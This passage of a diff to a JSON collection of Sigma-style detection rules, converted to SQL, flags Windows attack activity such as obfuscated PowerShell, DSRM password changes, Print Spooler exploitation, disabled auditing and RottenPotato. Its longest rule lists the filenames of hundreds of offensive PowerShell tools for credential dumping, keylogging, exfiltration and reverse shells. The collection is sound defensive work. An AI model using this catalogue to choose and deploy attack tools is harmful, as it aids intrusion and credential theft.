TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT 
((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + 
"attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - 
"id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via 
GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 
'%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename 